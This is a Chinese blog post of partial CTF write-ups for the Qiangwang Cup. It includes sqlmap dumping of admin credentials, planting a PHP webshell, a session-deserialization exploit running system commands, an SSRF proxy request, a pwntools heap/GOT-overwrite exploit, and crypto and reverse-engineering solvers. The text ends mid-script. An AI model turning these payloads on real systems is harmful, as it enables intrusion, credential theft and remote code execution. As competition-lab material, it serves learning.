【强网杯】部分wp

laZyGary

已于 2024-12-11 14:54:43 修改

阅读量829

点赞数 12

文章标签：网络安全安全 web java

于 2024-12-11 10:45:23 首次发布

本文链接：https://blog.csdn.net/2201_75588208/article/details/144394413

版权

givemesecret

尝试多次询问即可

xiaohuanxiong

下发容器后需要先执行http://39.106.48.123:44724/install安装cms

后台http://39.106.48.123:44724/admin

sql注入点：sqlmap -u "http://39.106.48.123:44724/search?keyword=1"

管理员用户：sqlmap -u "http://39.106.48.123:44724/search?keyword=1" -D xiaohuanxiong -T e86ca84c_admin -C id,password,username --dump --batch

密码加密方式：md5+salt

网站源码：GitHub - funclown/xiaohuanxiong

问题：目前这个salt不知道系统安装的时候设置成啥了

http://39.107.90.219:32957/admin/admins

后续发现未授权访问后台，直接访问后台，审计相关功能

支付管理页面可以看到右侧可以设置php代码（本来就有一段php代码），写入一句话木马

使用蚁剑成功连接

PyBlockly

将第一个双引号框放到右边

通过全角绕过

修改内置函数，将len内置函数的返回值替换为总返回1的匿名函数，命令执行读取flag，构造payload

easy_heap

libc2.35打iofile

from pwn import *
import argparse


context.log_level = "debug"

conn = remote('47.93.15.136',32860)
libc_lib = ELF('libc-2.35.so', checksec=False)
binary = ELF('./pwn', checksec=False)

def create_item(size):
    conn.sendlineafter(b'Enter your choice: ', b'1')
    conn.sendlineafter(b'Enter your commodity size \n', str(size).encode())

def remove_item(index):
    conn.sendlineafter(b'Enter your choice: ', b'2')
    conn.sendlineafter(b'Enter which to delete: \n', str(index).encode())

def update_item(index, content):
    conn.sendlineafter(b'Enter your choice: ', b'3')
    conn.sendlineafter(b'Enter which to edit: \n', str(index).encode())
    conn.sendlineafter(b'Input the content \n', str(content).encode())

def display_item(index):
    conn.sendlineafter(b'Enter your choice: ', b'4')
    conn.sendlineafter(b'Enter which to show: \n', str(index).encode())
    conn.recvuntil(b'The content is here \n')
    return conn.recvuntil(b'Menu:\n')[:-6]

def hidden_function():
    conn.sendlineafter(b'Enter your choice: ', b'5')
    conn.sendlineafter(b'Maybe you will be sad !\n', b'2')

def custom_function(target_addr, content):
    conn.sendlineafter(b'Enter your choice: ', b'10')
    conn.sendafter(b'Input your target addr \n', target_addr)
    conn.send(content)

create_item(0x628)
create_item(0x618)
create_item(0x638)
create_item(0x618)

remove_item(1)

libc_lib.address = u64(display_item(1)[:8]) + 0x9c0 - libc_lib.sym['_IO_2_1_stderr_']
success("libc_lib.address = " + hex(libc_lib.address))

got_strlen_addr = libc_lib.address + 0x21a118
custom_function(p64(got_strlen_addr), p64(libc_lib.sym["printf"]))

hidden_function()

conn.interactive()

flag:flag{4a1ae50a-1717-40b2-acbc-f11c0c1f115f}

platform

通过服务器代码发现是php session反序列化

import requests

# 配置目标 URL 和请求参数
target_url = "http://eci-2ze51w201x5hnagalpj4.cloudeci1.ichunqiu.com:80"
query_params = {'cmd': "/readflag"}
form_data = {
    'auth_token': ';session_id|O:15:"notouchitsclass":1:{s:4:"data";s:24:"("sys"."tem")($_GET[cmd]);";}auth_token|s:1:"c"',
    'login_user': 'arbitrarycommandexecution'
}

# HTTP 请求头设置
request_headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Cache-Control': 'no-cache',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Pragma': 'no-cache',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
}

# 无限循环，直到 flag 被找到
while True:
    # 创建新的会话实例
    session_instance = requests.Session()

    try:
        # 依次发送两个请求到 /index.php，尝试在会话中注入恶意代码
        for _ in range(2):
            session_instance.post(
                target_url + '/index.php',
                headers=request_headers,
                params=query_params,
                data=form_data,
                verify=False,
                allow_redirects=False
            )

        # 发送请求到 /dashboard.php，尝试触发恶意代码并读取 flag
        response_flag = session_instance.post(
            target_url + '/dashboard.php?cmd=/readflag',
            headers=request_headers,
            verify=False,
            allow_redirects=False
        )

        # 检查响应内容中是否包含 "flag"
        if "flag" in response_flag.text:
            print("Flag found:")
            print(response_flag.text)
            print("Cookies:")
            print(session_instance.cookies)
            break
    except requests.RequestException as e:
        print(f"Request error: {e}")
    finally:
        session_instance.close()

flag:flag{720c420b-3bd3-4681-bf17-8b18dea58010}

21_steps

直接问chatgpt

from pwn import *
import re
import random


# Connect to the specified address and port
io = remote('', )

# Send the predefined command
command = '''B=A>>1;B=B&113427455640312821154458202477256070485;B=A-B;A=B&68056473384187692692674921486353642291;B=B>>2;B=B&68056473384187692692674921486353642291;B=B+A;A=B>>4;B=B+A;B=B&20016609818878733144904388672456953615;A=B>>8;B=B+A;A=B>>16;B=B+A;A=B>>32;B=B+A;A=B>>64;B=B+A;B=B&127;A=B+0;'''
print(command)
io.sendline(command)
io.interactive()

# Regular expression pattern for command validation
pattern = r'([AB]|\d+)=([AB]|\d+)(\+|\-|\*|//|<<|>>|&|\^|%)\s*([AB]|\d+)'

# Read command from input
command = input("Enter your command: ").strip()
assert command[-1] == ';'  # Ensure command ends with semicolon

# Validate each operation in the command
assert all([re.fullmatch(pattern, i) for i in command[:-1].split(';')])

step = 21
for i in command[:-1].split(';'):
    t = i.translate(str.maketrans('', '', '=AB0123456789 '))
    if t in ['>>', '<<', '+', '-', '&', '^']:
        step -= 1
    elif t in ['*', '/', '%']:
        step -= 3
if step < 0:
    print("Step limit exceeded.")
    exit()

success = 0

# Function to count the number of 1s in the binary representation
w = lambda x: sum([int(i) for i in list(bin(x)[2:])])

# Test the command with 100 random values of A
for _ in range(100):
    A = random.randrange(0, 2**128)
    wa = w(A)
    B = 0
    try:
        exec("global A; global B;" + command)
    except Exception as e:
        print(f"Error during execution: {e}")
        exit()
    
    if A == wa:
        success += 1

# If successful with all 100 tests, print the flag
if success == 100:
    print(flag)

apbq

盘问chatgpt

from Crypto.Util.number import *
from sympy import symbols, solve, Matrix
from sympy import mod_inverse
from Crypto.Util.number import long_to_bytes, getRandomNBitInteger
import gmpy2
import itertools
import itertools
from Crypto.Util.number import long_to_bytes
hints =18978581186415161964839647137704633944599150543420658500585655372831779670338724440572792208984183863860898382564328183868786589851370156024615630835636170
n,e =(89839084450618055007900277736741312641844770591346432583302975236097465068572445589385798822593889266430563039645335037061240101688433078717811590377686465973797658355984717210228739793741484666628342039127345855467748247485016133560729063901396973783754780048949709195334690395217112330585431653872523325589, 65537)
enc1 =23664702267463524872340419776983638860234156620934868573173546937679196743146691156369928738109129704387312263842088573122121751421709842579634121187349747424486233111885687289480494785285701709040663052248336541918235910988178207506008430080621354232140617853327942136965075461701008744432418773880574136247
# Step 1: 计算 p 和 q
x = symbols('x')
roots = solve(x**2 - hints*x + n, x)
p, q = roots

print(f'p = {p}')
print(f'q = {q}')

# Step 2: 计算私钥 d
phi_n = (p-1) * (q-1)
d = mod_inverse(e, phi_n)

print(f'd = {d}')

# Step 3: 解密 enc1
flag0 = pow(enc1, d, n)
flag0_bytes = long_to_bytes(flag0)
flag1 = flag0_bytes.decode()
print(f'flag[0] = {flag0_bytes}')


hints = [18167664006612887319059224902765270796893002676833140278828762753019422055112981842474960489363321381703961075777458001649580900014422118323835566872616431879801196022002065870575408411392402196289546586784096, 16949724497872153018185454805056817009306460834363366674503445555601166063612534131218872220623085757598803471712484993846679917940676468400619280027766392891909311628455506176580754986432394780968152799110962, 17047826385266266053284093678595321710571075374778544212380847321745757838236659172906205102740667602435787521984776486971187349204170431714654733175622835939702945991530565925393793706654282009524471957119991, 25276634064427324410040718861523090738559926416024529567298785602258493027431468948039474136925591721164931318119534505838854361600391921633689344957912535216611716210525197658061038020595741600369400188538567, 22620929075309280405649238349357640303875210864208854217420509497788451366132889431240039164552611575528102978024292550959541449720371571757925105918051653777519219003404406299551822163574899163183356787743543, 20448555271367430173134759139565874060609709363893002188062221232670423900235907879442989619050874172750997684986786991784813276571714171675161047891339083833557999542955021257408958367084435326315450518847393, 16581432595661532600201978812720360650490725084571756108685801024225869509874266586101665454995626158761371202939602347462284734479523136008114543823450831433459621095011515966186441038409512845483898182330730, 23279853842002415904374433039119754653403309015190065311714877060259027498282160545851169991611095505190810819508498176947439317796919177899445232931519714386295909988604042659419915482267542524373950892662544, 16542280976863346138933938786694562410542429842169310231909671810291444369775133082891329676227328401108505520149711555594236523078258701726652736438397249153484528439336008442771240980575141952222517324476607, 17054798687400834881313828738161453727952686763495185341649729764826734928113560289710721893874591843482763545781022050238655346441049269145400183941816006501187555169759754496609909352066732267489240733143973, 22115728663051324710538517987151446287208882441569930705944807337542411196476967586630373946539021184108542887796299661200933395031919501574357288914028686562763621166172668808524981253976089963176915686295217, 19324745002425971121820837859939938858204545496254632010818159347041222757835937867307372949986924646040179923481350854019113237172710522847771842257888083088958980783122775860443475680302294211764812636993025, 17269103712436870749511150569030640471982622900104490728908671745662264368118790999669887094371008536628103283985205839448583011077421205589315164079023370873380480423797655480624151812894997816254147210406492, 17365467616785968410717969747207581822018195905573214322728668902230086291926193228235744513285718494565736538060677324971757810325341657627830082292794517994668597521842723473167615388674219621483061095351780, 20823988964903136690545608569993429386847299285019716840662662829134516039366335014168034963190410379384987535117127797097185441870894097973310130525700344822429616024795354496158261293140438037100429185280939, 19068742071797863698141529586788871165176403351706021832743114499444358327620104563127248492878047796963678668578417711317317649158855864613197342671267006688211460724339403654215571839421451060657330746917459, 20089639597210347757891251257684515181178224404350699015820324544431016085980542703447257134320668961280907495580251880177990935443438799776252979843969984270461013888122703933975001704404129130156833542263882, 22344734326131457204500487243249860924828673944521980798994250859372628295695660076289343998351448667548250129358262592043131205967592613289260998148991388190917863322690137458448696392344738292233285437662495, 22688858027824961235755458925538246922604928658660170686458395195714455094516952026243659139809095639584746977271909644938258445835519951859659822660413616465736923822988993362023001205350387354001389518742538, 21286046487289796335501643195437352334100195831127922478044197411293510360710188581314023052580692810484251118253550837525637065385439859631494533102244585493243972819369812352385425700028640641292410326514111, 21542729548465815605357067072323013570796657575603676418485975214641398139843537820643982914302122976789859817102498484496409546012119998359943274203338400776158986205776474024356567247508744784200354385060666, 22319592382753357951626314613193901130171847776829835028715915533809475362288873045184870972146269975570664009921662023590318988850871708674240304838922536028975978222603171333743353770676344328056539379240160, 25195209191944761648246874631038407055240893204894145709996399690807569652160721616011712739214434932639646688187304865397816188999592774874989401871300784534538762135830014255425391132306536883804201055992313, 18257804244956449160916107602212089869395886846990320452133193087611626919926796845263727422042179229606817439442521540784268169177331707314788427670112999551683927934427716554137597798283300120796277229509678, 20293403064916574136692432190836928681820834973375054705153628740577159076332283715581047503287766236543327123639746352358718218140738999496451259789097826888955418315455420948960832865750253988992454128969953, 15967654820584966012628708475666706277218484919923639492431538068059543232562431059752700377242326527417238151501168940191488179144049286512652111172149113549072003881460743035279388672984805823560897688895124, 25144187979876039024245879200325843092774389926620026124061775431569974232758799200333888039013494603721065709195353330350750055309315207499741437181094874894647736904055829877859906318073991986020178158776286, 15736932921640444103019961538951409924080453868073105830403926861058056351553271238438325117113945341892868641345117717666354739204401152657265824568724844930574396801692131746182948347887298330990039956813130, 18831072673439732764722762485733622234889447953507582396819704359771208236721692820362137219509611319088756045211407777880521726782697895768017460064889670066178710804124631128581556314122255564861269062385337, 23800437561684813552661749774840752013501533683948618798811470214669024646396165487093720960221009038817909066075238937189371227098032581450466402462014437421254375846263830927945343485988463525070074913720710, 24402191070622494792723290726249952159888270689258801831518209605331984684494095167423722682814769395395011136124403802097229547003802312444913008194461779426175966774202219703164060353710247619639616444797670, 20215481513831963554421686543560596857659844027486522940060791775984622049024173363533378455076109165728144576719015392033536498353094895564917644840994662704362121549525329105205514332808950206092190939931448, 18384453917605955747212560280232547481041600196031285084598132475801990710125754705645482436436531608696373462641765399622296314590071558616193035939108523357020287896879479452040171765916716377102454266933226, 21890401344164908103930010123434944359446535642544335610455613014563290097498740447164765588532234051104173227090428486681237432196639010849051113283297943367655458678533223039415083212229970648958070799280218, 18379893441293694747570620009241814202936873442370354246029979042247705730610190888710981918183390028386451290137755339890329474403224043675724851314770861939082447728194632548864823398818221526652331319263027, 18715827130228986951360013590464775001019026913384718876134449689773600060962392738619405370033085704046027397895627933844824630723286144367800484157574548819065406118338665931032779491897783504790669824301288, 13588739911708699123450670852772302012518315143187739886523841133752009403411431627334135210166268158490674049617489193734568451811305631563767138879895461211915128972052001136464325219117009268526575020143259, 18506039912943821193373920483847347155611306173368341979655092778147169768984477236224526786441466933360500418090210912574990962709452725122792963919616633389125605160796446674502416801964271004625701238202575, 22167985517547342184812919437069844889650448522260359154086923601900060998572245598167213217022051141570075284051615276464952346620430587694188548679895095556459804921016744713098882496174497693878187665372865, 21507363933875318987283059841465034113263466805329282129011688531718330888226928182985538861888698160675575993935166249701145994333840516459683763957425287811252135418288516497258724668090570720893589001392220, 20250321586608105267884665929443511322540360475552916143405651419034772061789298150974629817817611591100450468070842373341756704300393352252725859102426665187194754280129749402796746118608937061141768301995522, 16104259151024766025645778755951638093681273234415510444173981198301666343334808614748361662637508091511498829253677167171091582942780017355912433497214576425697459483727777273045993446283721290714044600814203, 14560242181138184594433372530956542527312169507277535425067427080573272033961044062335960097446781943943464713852520415535775461964590009720592053626735276833191667395201287169782350381649400286337671320581068, 16239347596615402699390026749150381714807445218767496868569282767673828662340774349530405347667558555781433774705139593469838946201218537641296949822639509296966092138954685186059819628696340121356660166937131, 21344472317634795288252811327141546596291633424850284492351783921599290478005814133560171828086405152298309169077585647189366292823613547973428250604674234857289341613448177246451956695700417432794886277704716, 16053809990112020217624905718566971288375815646771826941011489252522755953750669513046736360397030033178139614200701025268874379439106827823605937814395162011464610496629969260310816473733828751702925621950679, 18917855883623050190154989683327838135081813638430345099892537186954876489710857473326920009412778140451855952622686635694323466827034373114657023892484639238914593012175120540210780102536003758794571846502397, 22690171278715056779052233972642657173540399024770527983659216197108042021644328773010698851143953503599329885607621773816718008861742027388432534850163666629476315340137626681994316866368449548292328156728206, 21087818524872480052313215092436868441694786060866149491087132591272640372512484925209820065536439188250579925233059144898601140234767300574307770064543499923712729705795392684173268461519802573563186764326797, 18439753470094841291394543396785250736332596497190578058698960152415339036714664835925822942784700917586270640813663002161425694392259981974491535370706560550540525510875465091384383255081297963169390777475352, 20105719699015744146039374208926740159952318391171137544887868739518535254000803811729763681262304539724253518465850883904308979964535242371235415049403280585133993732946919550180260852767289669076362115454200, 17251599484976651171587511011045311555402088003441531674726612079301412643514474016351608797610153172169183504289799345382527665445027976807805594288914226822374523878290416047130731166794970645275146679838899, 23027331991437585896233907022469624030630702237261170259290872847355304456043379238362120518409085840638396736666056992747627271193089116095167049248270541979716594671069985183070290375121270398623215587207529, 18158149685496169798299129683009221264185608469410295069411669832919646968324946121757411511373498747604679198739125835462814352243797919744572086307939585501566092705355693015625009717017077302201663788208609, 18276153196656501517216055049560959047263892309902154534799806637704337317207294332426798932144785240877892837491213916540255237702169595754963908689566362060228840286531616263506272071630209104758589482803348, 19830654702835464289082520892939657653574451119898587213320188332842291005863699764597454403874285715252681820027919359194554863299385911740908952649966617784376852963552276558475217168696695867402522508290055, 15349828226638644963106414986240676364822261975534684137183044733508521003843559094515387144949811552173241406076270015291925943459603622043168219534080772937297911323165839870364550841685270125556125756627553, 20923687596111161976478930953796496927811701530608223491138786355445002217973253897724452954815797952200740069102515860924306246841340715110620719064010080520601890251137419840158983682372232110885549732743013, 21095748006022412831703352650023882351218414866517568822818298949510471554885207645049385966827210564667371665855668707424105040599599901165292360321667007968065708796593851653085339928947755081203265281357013, 20136320433636422315432754195821125224777716034031656342233368000257459497472596860252592531939146543685406198978058242599116859263546329669263543660114747385041549283367183026001454445297981439938401547228229, 16496919752274418275948572022974868132658743151124597724312835413857298109100258912203517423633396955060591787380445877361136405137884456764770035346437177846666365911942996404514058688909577420388537479730705, 13788728438272498164727737074811797093818033799836159894472736480763530670013682288670889124484670336660448907074673625466218166413315342420667608074179975422284472184048790475129281850298519112884101776426380, 24852871485448795332267345793743281093931161235481251209948049584749441451621572752080662697610253315331335180611651946374137068256112152253681972406000252076016099200912670370417045090034045383991812756120791, 18663346319122078996775762643035864683521213720864038756854558668694021987970601131985163948257100423991091156649638455828855082098689641225427227191064496066436196910238564311309556938903101074363279783438714, 21400068681031931459396470039651524575262457489792894764406364952394476440804779651233022862527636114968325782197380721095406628084183336358459476006267416033892771932528688312375109463803215034905281657962293, 16044158155847172030103761204572942507195578382208455423846603003318483484698088948486132040995746837257705704187725306831142305215342467016564452582165866039427184607605673304595194959499145031211096109534167, 16518253246325822837502418827700493807621067058438396395472266350036385535241769917459657069911028720968654253735107131282350340465691670072304718987805883113410923109703284511709226857412404454224134480632696, 22032469066601123287586507039704080058983969235246539501189720236880312024198451198788699002335010120658564926677243708367430773661097221076615953342733896063909953602379936312639192315223258556134958059637605, 17474611942177808070315948910226643697957069578572244709354155010512694059987765040746148981545760660371360975936526076852619987733316042847813177383519241505024635332293992920023420060610648140841369822739716, 20097265939024591617239874622716452182434300498447992668997438018575636772416262543204370899462096267444545094719202447520254303983442269757551626971917981420832391886214473318353984504467919530676605744560570, 18170251482705061226968041449812078923477452841162650888922564215790088545936753453513162197661916172215859504545409274440450807677845894292177296835154674774694992388033874349807244020099167681146357128785394, 18084007437523118129421476751918491055914528331902780911288404344016551650138679157754567938593688369062981279371320169939281882307797009116458871503759873023914718337944953764426183937635379280572434676575757, 17001811604221128900675671565539617923973183364469396458234914432162200119518252971721448274846235879320362924206656971472493711107677598961463553324277826426691784458674010708635756004550789902368338633272118, 20217009574515126619724139485885721324936960849401637840860565569588595992087537454744066905387396266844236387315004915383456736142307523960394594650088663019228826091309049211780607761862663242437656610298243, 25534440916970201550118006203706860249111087748000550226680885431006136131742280963090650607632467666558508520152535105122661615376298673454198064361094319699307084117001019115669670029195171047304283891069792, 18871869316294018605789169171879572816494092699556970507058691345095743053290043643010965660058888064972257990750611470141816041727746767146945121588515830427165739580791663951175220638901672353681640741068573, 20173968537913641339915058056878181363456579537994317562789857397928196160113042659777558550242315788417022891612723148843142958668959046890197219991727894451795438138592005695329607326086644956073759609743066, 20601943394990265144021144365970164017319737300436518536503270346147112565303361487668388700369636611354280332841812324530501569200031186584749278453651172121161814207025650519637781007286435981682228528706305, 16397528630087028144645213166977866073543422560337716097539091258081008408890966764995645782823950721804205427713461441138000880478364026137452291234097219085473748076681729365744710225699866258812642458184750, 21373350333568141000876969785296802670776508778278005158047105058430550665787088265486222905402690421155861103648370249249790560185790723042867282734693553039477436055775198037042047438047898227097749354619822, 17767469767416052322357795736899648760868316512079849340028040817353808899589201201338152114229279980849491049574543361275046276135253417685681262008211582060955974064559129311524323185960856955462761555353091, 22148352529815091269441663541923247974004854058764556809596705832663604786920964849725772666340437231503146814919702525852955831173047034475925578238466977606367380212886384487294569287202762127531620290162734, 21663842528026621741414050256553652815372885707031383713657826718944735177083300302064509342116651731671570591336596953911570477161536730982887182434407761036442993588590230296643001682944654490645815177777455, 20219077358929317461660881724990436334639078047412693497584358963241840513748365548465302817975329987854784305275832045889690022909383530837382543579292451297269623663257098458645056099201050578472103957851128, 18255302182526662903763852563401346841065939531070045000414364747445988455597258924280193695407035356029557886165605853810182770534711966292253269625917149411889979307227493949293798772727125069093642134972336, 24926064145128749429079117171467042019887257504329103038171762786986349157515552927216574990423327013202735544601170247730647598931030432792167867343343213411600516855009788294067588153504026267213013591793027, 22369607314724468760253123915374991621544992437057652340350735935680183705467064876346663859696919167243522648029531700630202188671406298533187087292461774927340821192866797400987231509211718089237481902671100, 16994227117141934754898145294760231694287000959561775153135582047697469327393472840046006353260694322888486978811557952926229613247229990658445756595259401269267528233642142950389040647504583683489067768144570, 21758885458682118428357134100118546351270408335845311063139309657532131159530485845186953650675925931634290182806173575543561250369768935902929861898597396621656214490429009706989779345367262758413050071213624, 20156282616031755826700336845313823798147854495428660743884481573484471099887576514309769978525225369254700468742981099548840277532978306665910844928986235042420698332201264764734685502001234369189521332392642, 23291765247744127414491614915358658114280269483384022733002965612273627987872443453777028006606037159079637857473229879140366385523633075816362547967658930666106914269093225208138749470566410361196451552322613, 19807792217079652175713365065361659318870738952921195173619551645956745050506271953949139230097128034416815169649874760890189515620232505703162831090225715453502422905418824316957257395992121750661389503495033, 22074209373194902539215367382758486068533032275912313703269990627206774967653336496619231924013216321042649461711292555464574124714934511202231319963361912937842068483700298097209400217869036338644607607557860, 19678336511265998427322297909733474384702243426420286924671444552444079816707773485084891630780465895504253899943221044355971296122774264925882685351095921532685536165514189427245840338009573352081361238596378, 24746314790210393213546150322117518542380438001687269872679602687597595933350510598742749840102841364627647151669428936678130556027300886850086220074563664367409218038338623691372433831784916816798993162471163, 19346137206512895254202370018555139713690272833895195472766704715282164091959131850520571672509601848193468792313437642997923790118115476212663296111963644011010744006086847599108492279986468255445160241848708, 22739514514055088545643169404630736699361136323546717268615404574809011342622362833245601099992039789664042350284789853188040159950619203242924511038681127008964592137006103547262538912024671048254652547084347, 21491512279698208400974501713300096639215882495977078132548631606796810881149011161903684894826752520167909538856354238104288201344211604223297924253960199754326239113862002469224042442018978623149685130901455, 19381008151938129775129563507607725859173925946797075261437001349051037306091047611533900186593946739906685481456985573476863123716331923469386565432105662324849798182175616351721533048174745501978394238803081, 19965143096260141101824772370858657624912960190922708879345774507598595008331705725441057080530773097285721556537121282837594544143441953208783728710383586054502176671726097169651121269564738513585870857829805]
n, e = (73566307488763122580179867626252642940955298748752818919017828624963832700766915409125057515624347299603944790342215380220728964393071261454143348878369192979087090394858108255421841966688982884778999786076287493231499536762158941790933738200959195185310223268630105090119593363464568858268074382723204344819, 65537)
enc2 =30332590230153809507216298771130058954523332140754441956121305005101434036857592445870499808003492282406658682811671092885592290410570348283122359319554197485624784590315564056341976355615543224373344781813890901916269854242660708815123152440620383035798542275833361820196294814385622613621016771854846491244
V = hints[:4]
k = 2^800
# 构建并转换为 SageMath 矩阵
M = matrix([[k * v for v in V]]).transpose().augment(identity_matrix(len(V)))
B = [b[1:] for b in M.LLL()]
M = (k * matrix(B[:len(V) - 2])).transpose().augment(identity_matrix(len(V)))
B = [b[-len(V):] for b in M.LLL() if set(b[:len(V) - 2]) == {0}]
for s, t in itertools.product(range(4), repeat=2):
    T = s*B[0] + t*B[1]
    a1, a2, a3, a4 = T
    kq = gcd(a1 * hints[1] - a2 * hints[0], n)
    if 1 < kq < n:
        print('find!', kq, s, t)
        break
for i in range(2**16, 1, -1):
    if kq % i == 0:
        kq //= i
q = int(kq)
p = int(n // kq)
d = pow(0x10001, -1, (p - 1) * (q - 1))
m = pow(enc2, d, n)
flag2 = long_to_bytes(int(m)).decode()
enc3 =17737974772490835017139672507261082238806983528533357501033270577311227414618940490226102450232473366793815933753927943027643033829459416623683596533955075569578787574561297243060958714055785089716571943663350360324047532058597960949979894090400134473940587235634842078030727691627400903239810993936770281755
flag3 = long_to_bytes(int(pow(int(enc3), int(d), int(n)))).decode()
print(flag1 + flag2 + flag3)

Mips:

逆向分析可知，结果和原文是一一对应关系，直接尝试爆破，在xor=0x0a出flag

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

unsigned char deadbeef[256] = {0xDE, 0xAD, 0xBE, 0xEF};

char *enc(char *input, int xor) {
    unsigned char SBox[256] = {0x36, 0x68, 0x32, 0x44, 0x12, 0x61, 0x6f, 0xdf, 0xba, 0xe9, 0x98, 0x28, 0x3d, 0xa8, 0xe6, 0x1e, 0x4d, 0xf2, 0xb1, 0x7e, 0xc2, 0x6a, 0x96, 0x8c, 0x37, 0x19, 0x14, 0x42, 0xa2, 0x11, 0xe5, 0x5b, 0x9d, 0x23, 0x3, 0x83, 0xf8, 0xd8, 0x9, 0x8a, 0x3c, 0x7d, 0x1a, 0x46, 0x49, 0xdc, 0x76, 0x63, 0x3e, 0x4, 0x9a, 0xc, 0x43, 0x4b, 0x72, 0x5f, 0x53, 0x21, 0x74, 0x66, 0x4f, 0xa7, 0xf6, 0x7b, 0x94, 0xa3, 0x47, 0x8f, 0xf4, 0x52, 0x2a, 0x89, 0x30, 0x33, 0x27, 0x2c, 0xf5, 0x75, 0x17, 0x79, 0x5e, 0x7f, 0x9c, 0xcb, 0x55, 0xbb, 0x60, 0x38, 0xb8, 0xd2, 0xd4, 0x8b, 0xbf, 0x1f, 0x41, 0x45, 0x0, 0x82, 0x69, 0x40, 0xe1, 0x9f, 0xe2, 0xd3, 0x4a, 0x1c, 0x71, 0x62, 0x18, 0x24, 0x97, 0x84, 0xa, 0x8e, 0x3f, 0xf, 0x1, 0x86, 0xe, 0x67, 0xc9, 0x99, 0x88, 0xb0, 0x6e, 0x54, 0x92, 0xef, 0x9b, 0xd5, 0xa5, 0xb, 0xdd, 0xbd, 0xae, 0xcc, 0xc8, 0x3a, 0x65, 0x56, 0xe0, 0xf1, 0x6, 0x1b, 0xfa, 0xbc, 0xc4, 0x91, 0xc1, 0x2e, 0x13, 0xf0, 0x58, 0xee, 0xac, 0xec, 0xa6, 0x26, 0x39, 0xb5, 0xaf, 0xc3, 0x10, 0x5a, 0xd, 0x5d, 0x29, 0x15, 0x6b, 0x50, 0xb2, 0xfe, 0xaa, 0x90, 0xa9, 0x51, 0xd0, 0xb6, 0xc6, 0x34, 0xfc, 0xa0, 0xb3, 0x35, 0xea, 0x7, 0xa4, 0x22, 0x80, 0x6d, 0x81, 0x57, 0x87, 0x25, 0xc7, 0x4c, 0xd6, 0xce, 0x77, 0xd7, 0xad, 0x78, 0x7a, 0x85, 0xa1, 0xf3, 0xe8, 0x5c, 0x73, 0x48, 0xda, 0x31, 0x4e, 0x2d, 0x93, 0x16, 0x2, 0x70, 0x1d, 0xfb, 0xcd, 0xe3, 0xf7, 0x64, 0xf9, 0xc5, 0x8, 0x9e, 0x95, 0x2b, 0xe4, 0x20, 0xd1, 0xfd, 0x7c, 0x2f, 0xbe, 0xb9, 0xdb, 0xde, 0xe7, 0xd9, 0x3b, 0xeb, 0xff, 0xb7, 0xca, 0xb4, 0x5, 0xc0, 0xab, 0xcf, 0xed, 0x6c, 0x8d, 0x59};
    int i, j, v5 = 0, v6 = 0;
    unsigned char v7 = 0, v8 = 0, temp = 0, temp2 = 0, temp3 = 0, t1 = 0;
    unsigned char *v14 = (char *)malloc(256);
    unsigned char v12, v3;
    // 鍔犲瘑杩囩▼
    for (j = 0; j < 22; j++) {
        v12 = SBox[++v7];
        v8 += v12;
        SBox[v7] = SBox[v8];
        SBox[v8] = v12;
        v3 = (( ((((input[j + 5] << 7) | (input[j + 5] >> 1)) << 6) ^ 0x0FFFFFFC0) | ((((input[j + 5] << 7) | (input[j + 5] >> 1)) & 0xff) >> 2) ^ 0x3B) ^ 0x0FFFFFFBE);
        // printf("%x %x\n", ttt1, v3);
        temp = (((v3 << 5) | (v3 >> 3)) ^ 0xFFFFFFAD) & 0xff;
        temp2 = (((temp << 4) | (temp >> 4)) ^ 0x0FFFFFFDE) & 0xff;
        temp3 = ((temp2 << 3) | (temp2 >> 5));
        v14[j] = SBox[(SBox[v7] + v12) & 0xff] ^ deadbeef[j & 3] ^ temp3;
        // printf("%x %x %x %x %x %x\n", v3, temp, temp2, temp3, v14[j], SBox[SBox[v7] + v12]);
        // for (int i = 0; i < 256; i ++){
        //     printf("%.2x ", SBox[i] & 0xff);
        //     if (i % 16 == 15) printf("\n");
        // }
    }
    for (int i = 0; i < 22; i ++){
        v14[i] ^= xor;
    }
    // unsigned char t2;
    // t2 = v14[7];
    // v14[7] = v14[11];
    // v14[11] = t2;

    // t2 = v14[12];
    // v14[12] = v14[16];
    // v14[16] = t2;
    return v14;
}

int main() {
    unsigned char *input = malloc(30);
    memcpy(input, "flag{AAAAAAAAAAAAAAAAAAAAA}", 27);
    unsigned char result[30] = {0xC4, 0xEE, 0x3C, 0xBB, 0xE7, 0xFD, 0x67, 0x1D, 0xF8, 0x97, 0x68, 0x9D, 0x0B, 0x7F, 0xC7, 0x80, 0xDF, 0xF9, 0x4B, 0xA0, 0x46, 0x91};
    unsigned temp = 0;
    temp = result[7];
    result[7] = result[11];
    result[11] = temp;

    temp = result[12];
    result[12] = result[16];
    result[16] = temp;
    // 0x0a ^ 0xe3 = 0xe9 != c4
    for (int k = 0; k < 256; k ++) {
        for (int i = 0; i < 22; i ++){
            int j = 0;
            for (; j < 256; j ++){
                input[5 + i] = j;
                unsigned char *encrypted = enc(input, k);
                if (result[i] == encrypted[i]) {
                    printf("%c" , j);
                    break;
                }
            }
            if (j == 256) {
                printf("?");
            }
        }
        printf("\n");
    }
    return 0;
}

flag{QeMu_r3v3rs3in9_h@ck6}

Proxy

这道题，v1 路由，权限限制只能由本地地址 127.0.0.1访问，通过 `/v2/api/proxy` 路由访问 `/v1/api/flag` 的内容，构造一个请求从外部环境代理到 127.0.0.1 的 v1 路由，从而绕过IP限制获取标志。payload如下：curl -X POST http://101.200.33.255:36881/v2/api/proxy \

-H "Content-Type: application/json" \

-d '{

"url": "http://127.0.0.1:8769/v1/api/flag",

"method": "POST",

"body": "",

"headers": {

"Authorization": ""

"follow_redirects": true

回显：{"flag":"ZmxhZ3tmNzZlYTNlYi0yMDI3LTRhM2YtYjRjNS04YWNiNTI4ZjIzNjZ9"}

echo 'ZmxhZ3tmNzZlYTNlYi0yMDI3LTRhM2YtYjRjNS04YWNiNTI4ZjIzNjZ9' | base64 --decode

输出flag：flag{f76ea3eb-2027-4a3f-b4c5-8acb528f2366}

snake

页面是个贪吃蛇游戏，但是会自动一直右走，分析网络数据包可以编写自动跑得逻辑，代码如下：

```python

import requests

import time

# 服务器的URL

url = "http://eci-2zeg4gjm1ccoteb8ca5w.cloudeci1.ichunqiu.com:5000/move"

headers = {

"Content-Type": "application/json",

